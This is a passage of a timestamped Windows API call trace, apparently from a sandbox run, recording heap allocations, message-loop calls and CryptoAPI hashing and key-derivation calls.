RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0266.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0266.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0266.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0266.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51e20 [0266.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51e20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0266.034] CryptHashData (hHash=0xa872d0, pbData=0x2e55058, dwDataLen=0x3, dwFlags=0x1) returned 1 [0266.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0266.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0266.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0266.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0266.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0266.035] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0266.035] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0266.035] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0266.035] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0266.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0266.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0266.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0266.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0266.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55118 [0266.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0266.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0266.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0266.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0266.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0266.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0266.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0266.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0266.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e50 [0266.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.036] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0266.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0266.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0266.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0266.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0266.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0266.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0266.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51dd8 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0266.038] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0266.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0266.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0266.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0266.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0266.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0266.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0266.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0266.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0266.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0266.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0266.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0266.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0266.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0266.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51c58, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0266.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.041] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0266.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.041] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa872d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa870d0) returned 1 [0266.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.042] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51eb0 [0266.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0266.042] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0266.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0266.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0266.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 